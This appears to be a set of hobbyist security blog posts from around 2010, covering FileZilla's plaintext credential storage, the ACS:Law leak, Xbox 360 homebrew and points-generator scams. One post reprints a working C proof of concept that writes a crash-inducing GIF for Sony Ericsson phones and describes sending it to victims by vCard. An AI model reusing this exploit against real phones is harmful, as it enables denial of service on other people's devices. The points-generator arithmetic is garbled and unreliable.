FileZilla - A Colossal Mistake

I realize that among the internet there are some very dedicated FileZilla fans(which admittedly is probably because they haven't tried any other FTP program) but I feel this has to be said.

As I am sure some know, the popular open source program for FTPing, FileZilla, has been found to be doing the super smart move of storing all saved credentials for your saved FTP servers in a handy .xml file.

This is absolutely disgusting design, with the rich support developers have today such as help sites and massive archives on their choice of programming language, one would expect FileZilla developers to be able to find a way to efficiently protect user's data and to be understanding of basic computer security and how storing passwords locally is about as sensible as writing your PIN code on the back of your credit card.

Eww, I have horrible comma splicing today.

Anyway, excusing my horrible grammar, I decided to test how simple it was to locate the login data of someone. Not only was the answer to this question was "extremely simple" but also, the FileZilla site gave me an exact directory(on both Linux and Windows)

This is by design, it is the task of the operating system to protect your private data.

This is the excuse reason that the FileZilla developers say is why your information is not stored, unfortunately, as everyone knows, it is extremely profitable for creators of malware right now, (though this idea isn't in the heads of FileZilla developers)

It is your responsibility to keep your operating system secure, I cannot say that is not the case, but bundling this to be the reason behind their own incompetence is ridiculous.

The truth of the matter is that while, yes, you should try and keep your operating system as secure as possible. FileZilla are doing what would be equivalent to Microsoft not patching the recent LNK vulnerability because you let them down by getting infected with malware using it.

Not acceptable, FileZilla.

ACS: Law.

[All information was gained through a third party, who shared what he read with me]

I'm sure that by now you have heard the story of ACS-Law, and the media field day(or, more specifically, to talk shit about how we are in a "WE ARE IN A FULL SCALE CYBER WAR")

First of all, the method Andrew Crossley and his mafia-like family used was honey potting people, which is, as far as I know,(in the UK) illegal. The problem is that the way both ACS and its customers went about their work was very sloppy.

For starters, a series of unencrypted, completely unsecured databases of suspected file-sharers were sent back and forth between ACS and their customers (included two of the big three in the UK ISP market)

Didn't one of the Neanderthals at ACS consider that its probably best NOT to let personal information get sent around in an unsecured form?

Secondly, ACS:Law didn't seem to give a damn about who they wanted to bully. In one example, a letter was sent to a elderly couple, who can only just about e-mail their grandchildren, saying they had been found guilty of downloading pornographic movies. The letter was responded to explaining that the only income the couple had was their train pension, and after a long email conversation, someone at ACS found a slight bit of compassion and understanding.

Thirdly, why was "Jasp" (believed to be from a porn site called Relish) agreeing to the idea of using both Relish and another supplier simultaneously? This meant that, basically, if you downloaded one Relish film(which if your a victim of ACS you probably didn't) you could be charged with downloaded 2+ relish films or films from relish and the other supplier. The idea of this is, to of course, make money.

The second supplier in question may be the "Freddie's whatever.whatever.whatever" company, as most of the content people apparently downloaded was from this "Freddie"

It would also be nice to know why Andrew Crossley had a addiction to bringing his personal life into the workplace. In a email entitled "bed and ice" Andrew blasted his ex-wife and her new partner, describing her as a druggie and her new partner as a hermit.

Other analysis of Andrew's emails shows him joking and boasting about the amount of money he makes, and joking about what car to buy(expensive choices ehh, Andrew?)

Lets sum this up:

ACS:Law:
Beefed up accusations with additional charges
Let employees send offensive and harassing emails
Agreed to manipulate accusations for financial gain
Fail at security
Get on average nearly £300 for each case(on a ministry of sound album)



Oh yeah. Their super secret technology is "Eyenet" by NG3 Systems (mg3sys.com)

Sony Erricsson: From Crash To Brick

Fellow nerds may recall the GIF file crach by LE Quack posted on inj3ct0r.com, if you didn't see it, here is some C code to generate the file:

// ,-------------------------------------------,
// | [+] Title: Sony Ericsson GIF Crash bug |
// | [+] Date: 2010-06-07 |
// | [+] Author: Le Quack |
// | [+] Version: All Sony Ericssons from Txxx |
// | [+] Tested on: T630, K750i, W610i |
// | [+] Category: Local |
// `-------------------------------------------'

// ,--------------------------------------------------------------------------------------------------,
// | Any attempt to show generated image will crash the phone (white screen and restart). |
// | It is also possible to create a vCard containing this image (Google), that will be automatically |
// | saved in the images' main directory just after accepting our vCard by victim. Of course you can |
// | include your phone number and reset victim's phone whenever you want (just call him). The only |
// | way to get rid of this file is deleting it by cable/bluetooth (or just format a memory). |
// `--------------------------------------------------------------------------------------------------'

#include

using namespace std;

int main(int argc, char **argv)
{
unsigned char data[] =
{
0x47, 0x49, 0x46, 0x38, 0x39, 0x61, 0x01, 0x00, 0x01, 0x00, 0xF7, 0x00, 0x00, 0x00, 0x00, 0x00,
0x80, 0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x80, 0x00, 0x00, 0x00, 0x80, 0x80, 0x00, 0x80, 0x00,
0x80, 0x80, 0x80, 0x80, 0x80, 0xC0, 0xC0, 0xC0, 0xFF, 0x00, 0x00, 0x00, 0xFF, 0x00, 0xFF, 0xFF,
0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0xFF, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x00, 0x00, 0x66, 0x00, 0x00,
0x99, 0x00, 0x00, 0xCC, 0x00, 0x00, 0xFF, 0x00, 0x33, 0x00, 0x00, 0x33, 0x33, 0x00, 0x33, 0x66,
0x00, 0x33, 0x99, 0x00, 0x33, 0xCC, 0x00, 0x33, 0xFF, 0x00, 0x66, 0x00, 0x00, 0x66, 0x33, 0x00,
0x66, 0x66, 0x00, 0x66, 0x99, 0x00, 0x66, 0xCC, 0x00, 0x66, 0xFF, 0x00, 0x99, 0x00, 0x00, 0x99,
0x33, 0x00, 0x99, 0x66, 0x00, 0x99, 0x99, 0x00, 0x99, 0xCC, 0x00, 0x99, 0xFF, 0x00, 0xCC, 0x00,
0x00, 0xCC, 0x33, 0x00, 0xCC, 0x66, 0x00, 0xCC, 0x99, 0x00, 0xCC, 0xCC, 0x00, 0xCC, 0xFF, 0x00,
0xFF, 0x00, 0x00, 0xFF, 0x33, 0x00, 0xFF, 0x66, 0x00, 0xFF, 0x99, 0x00, 0xFF, 0xCC, 0x00, 0xFF,
0xFF, 0x33, 0x00, 0x00, 0x33, 0x00, 0x33, 0x33, 0x00, 0x66, 0x33, 0x00, 0x99, 0x33, 0x00, 0xCC,
0x33, 0x00, 0xFF, 0x33, 0x33, 0x00, 0x33, 0x33, 0x33, 0x33, 0x33, 0x66, 0x33, 0x33, 0x99, 0x33,
0x33, 0xCC, 0x33, 0x33, 0xFF, 0x33, 0x66, 0x00, 0x33, 0x66, 0x33, 0x33, 0x66, 0x66, 0x33, 0x66,
0x99, 0x33, 0x66, 0xCC, 0x33, 0x66, 0xFF, 0x33, 0x99, 0x00, 0x33, 0x99, 0x33, 0x33, 0x99, 0x66,
0x33, 0x99, 0x99, 0x33, 0x99, 0xCC, 0x33, 0x99, 0xFF, 0x33, 0xCC, 0x00, 0x33, 0xCC, 0x33, 0x33,
0xCC, 0x66, 0x33, 0xCC, 0x99, 0x33, 0xCC, 0xCC, 0x33, 0xCC, 0xFF, 0x33, 0xFF, 0x00, 0x33, 0xFF,
0x33, 0x33, 0xFF, 0x66, 0x33, 0xFF, 0x99, 0x33, 0xFF, 0xCC, 0x33, 0xFF, 0xFF, 0x66, 0x00, 0x00,
0x66, 0x00, 0x33, 0x66, 0x00, 0x66, 0x66, 0x00, 0x99, 0x66, 0x00, 0xCC, 0x66, 0x00, 0xFF, 0x66,
0x33, 0x00, 0x66, 0x33, 0x33, 0x66, 0x33, 0x66, 0x66, 0x33, 0x99, 0x66, 0x33, 0xCC, 0x66, 0x33,
0xFF, 0x66, 0x66, 0x00, 0x66, 0x66, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x99, 0x66, 0x66, 0xCC,
0x66, 0x66, 0xFF, 0x66, 0x99, 0x00, 0x66, 0x99, 0x33, 0x66, 0x99, 0x66, 0x66, 0x99, 0x99, 0x66,
0x99, 0xCC, 0x66, 0x99, 0xFF, 0x66, 0xCC, 0x00, 0x66, 0xCC, 0x33, 0x66, 0xCC, 0x66, 0x66, 0xCC,
0x99, 0x66, 0xCC, 0xCC, 0x66, 0xCC, 0xFF, 0x66, 0xFF, 0x00, 0x66, 0xFF, 0x33, 0x66, 0xFF, 0x66,
0x66, 0xFF, 0x99, 0x66, 0xFF, 0xCC, 0x66, 0xFF, 0xFF, 0x99, 0x00, 0x00, 0x99, 0x00, 0x33, 0x99,
0x00, 0x66, 0x99, 0x00, 0x99, 0x99, 0x00, 0xCC, 0x99, 0x00, 0xFF, 0x99, 0x33, 0x00, 0x99, 0x33,
0x33, 0x99, 0x33, 0x66, 0x99, 0x33, 0x99, 0x99, 0x33, 0xCC, 0x99, 0x33, 0xFF, 0x99, 0x66, 0x00,
0x99, 0x66, 0x33, 0x99, 0x66, 0x66, 0x99, 0x66, 0x99, 0x99, 0x66, 0xCC, 0x99, 0x66, 0xFF, 0x99,
0x99, 0x00, 0x99, 0x99, 0x33, 0x99, 0x99, 0x66, 0x99, 0x99, 0x99, 0x99, 0x99, 0xCC, 0x99, 0x99,
0xFF, 0x99, 0xCC, 0x00, 0x99, 0xCC, 0x33, 0x99, 0xCC, 0x66, 0x99, 0xCC, 0x99, 0x99, 0xCC, 0xCC,
0x99, 0xCC, 0xFF, 0x99, 0xFF, 0x00, 0x99, 0xFF, 0x33, 0x99, 0xFF, 0x66, 0x99, 0xFF, 0x99, 0x99,
0xFF, 0xCC, 0x99, 0xFF, 0xFF, 0xCC, 0x00, 0x00, 0xCC, 0x00, 0x33, 0xCC, 0x00, 0x66, 0xCC, 0x00,
0x99, 0xCC, 0x00, 0xCC, 0xCC, 0x00, 0xFF, 0xCC, 0x33, 0x00, 0xCC, 0x33, 0x33, 0xCC, 0x33, 0x66,
0xCC, 0x33, 0x99, 0xCC, 0x33, 0xCC, 0xCC, 0x33, 0xFF, 0xCC, 0x66, 0x00, 0xCC, 0x66, 0x33, 0xCC,
0x66, 0x66, 0xCC, 0x66, 0x99, 0xCC, 0x66, 0xCC, 0xCC, 0x66, 0xFF, 0xCC, 0x99, 0x00, 0xCC, 0x99,
0x33, 0xCC, 0x99, 0x66, 0xCC, 0x99, 0x99, 0xCC, 0x99, 0xCC, 0xCC, 0x99, 0xFF, 0xCC, 0xCC, 0x00,
0xCC, 0xCC, 0x33, 0xCC, 0xCC, 0x66, 0xCC, 0xCC, 0x99, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xFF, 0xCC,
0xFF, 0x00, 0xCC, 0xFF, 0x33, 0xCC, 0xFF, 0x66, 0xCC, 0xFF, 0x99, 0xCC, 0xFF, 0xCC, 0xCC, 0xFF,
0xFF, 0xFF, 0x00, 0x00, 0xFF, 0x00, 0x33, 0xFF, 0x00, 0x66, 0xFF, 0x00, 0x99, 0xFF, 0x00, 0xCC,
0xFF, 0x00, 0xFF, 0xFF, 0x33, 0x00, 0xFF, 0x33, 0x33, 0xFF, 0x33, 0x66, 0xFF, 0x33, 0x99, 0xFF,
0x33, 0xCC, 0xFF, 0x33, 0xFF, 0xFF, 0x66, 0x00, 0xFF, 0x66, 0x33, 0xFF, 0x66, 0x66, 0xFF, 0x66,
0x99, 0xFF, 0x66, 0xCC, 0xFF, 0x66, 0xFF, 0xFF, 0x99, 0x00, 0xFF, 0x99, 0x33, 0xFF, 0x99, 0x66,
0xFF, 0x99, 0x99, 0xFF, 0x99, 0xCC, 0xFF, 0x99, 0xFF, 0xFF, 0xCC, 0x00, 0xFF, 0xCC, 0x33, 0xFF,
0xCC, 0x66, 0xFF, 0xCC, 0x99, 0xFF, 0xCC, 0xCC, 0xFF, 0xCC, 0xFF, 0xFF, 0xFF, 0x00, 0xFF, 0xFF,
0x33, 0xFF, 0xFF, 0x66, 0xFF, 0xFF, 0x99, 0xFF, 0xFF, 0xCC, 0xFF, 0xFF, 0xFF, 0x21, 0xF9, 0x04,
0x01, 0x00, 0x00, 0x10, 0x00, 0x2C, 0xF0, 0x00, 0xF0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,
0x04, 0x00, 0xFF, 0x05, 0x04, 0x00, 0x3B,
} ;

printf("\n[+] Sony Ericsson GIF Crash bug\n");
printf("[+] Coded and discovered by Le Quack \n");
printf("[+] Generated file should work with models from Txxx, tested on T630, K750i, W610i\n\n");

if(argc != 2)
{
printf("[+] Usage: %s \n", argv[0]);
return 0;
}

FILE* pFile;
pFile = fopen(argv[1], "wb");
if(pFile == NULL)
{
printf("[-] Error creating file. Exiting.");
return 0;
}

fwrite(data, 1, sizeof(data), pFile);

printf("[+] File has been saved as \"%s\"\n", argv[1]);
printf("[+] Written %d bytes\n", sizeof(data));

fclose(pFile);

return 0;

}

 Anyway, To activate the hidden safe mode on Sony Erricsson phones using this image and unlocking an option where arbitary code can be executed(with added work) just set it too the start-up picture.

The phone goes into panic mode, wherein any function which affects or uses external hardware (e.g camera or light) is disabled. The clicking of one of these things will leave the phone bricked if you turn it off without setting a different start-up picture.

The benefit of this hidden mode is that is does things dodgier, and pretty much dismounts any attempt to verify hardware.

Xbox 360 Kernal Debug Proof Of Concept

------------------------------------------------------
___________ _______________
\_ _____/______ ____ ____ / _____/\ _ \
| __) \_ __ \_/ __ \_/ __ \/ __ \ / /_\ \
| \ | | \/\ ___/\ ___/\ |__\ \\ \_/ \
\___ / |__| \___ >\___ >\_____ / \_____ /
\/ \/ \/ \/ \/
By Complex--------------------------------------------
Thanks:
DJ Sheperd For Package Creation help.
Free60 for all the work done.
scottyy for the awesome graphics.
desolateone for testing.
------------------------------------------------------


-----------------------------------Info---------------------------------------------------------------------
FreeBlade restores your old blade dashboard to your JTAG console temporarily under a controlled environment.
If you want to revert back to your old dash then you must load a arcade game and choose the return option.
------------------------------------------------------------------------------------------------------------


----------------------------CHANGELOG:--------------------------

Bugfixes:
minor stuff.

Improvements:
faster booting
Better graphics

Known Bugs:
Freezing when on memory screen.
Profile information is messed up.

put it in to hdd:\Content\0000000000000000\C0DE9996\00080000
ID: = FFFE08D3
----------------------------------------------------------------

~Complex
Download Link (@megaupload.com)

Xbox 360 USB Details

New xbox 360 update which has let you use usb drives as hard drives to store data on, many have been looking into it, here is some info:

Data0000 – System Information
Data0001 – Partition (XTAF) header
Data0002 to end – Directory Tree / File Data

To load a usb device, just merge all the data files and load the FATX partition at 20000000h. To save the partition back, just split the file like:
0h to 20000000h – Data0001
20000000h to 2005C000h – Data0002
2005C000h to end – Data0003/others

Me and Jizzabeez are too believe that for each GB a new data file is created but we are not sure so if anyone will confirm this please do.

I have made a application for File2Image and Image to file programs to manipulate the files, I am also going to be making this application open source so others can help improve it. I've been talking to Jizz nate and mojo to try and find out more about these files and a better program is in development.

Source Megaupload - 700KB

Program Megaupload - 100KB

Xbox 360 DVD File Creator

Old App I made to just test something, also, if the app has a "DVD checker" tab, ignore it, I forgot about it :/

Download (App+Source)

Microsoft Points Generator...Lol?

After all this time I still fail to see why people believe these things are real, first of, why would you need to enter your password? generating a code using a "known" algorithm wouoldn't require any sort of password.

Second, thing how big the scale of this operation would actually be. One way you can work out the possibility s by multiplying the ammount of digits in a code (25) by the ammount of characters used in generating that code (30, codes use the alphabet minus vowels and numbers 1-9, not 0)
so the probability of generating a working code is 25^(30) or put 25x25x25 (repeated 30 times)

This would work out as 5.147278302366225e+45 , or put longly:
2.168404344971009e+43
Thats 43 Zero's.

Therefore anybody claiming to have a points generator is talking out of there ass, because it would take the ammount above times before getting ONE key.

Of course this is before you consider that the majority of codes have to be authorized which happens at the time of purchase, when adding this factor the chances of a legit code turn too:

1 in 1510000000000000000000000000000000000000000

Infineon SLE 66PE Cracked

http://www.theregister.co.uk/2010/02/17/infineon_tpm_crack/

The story is there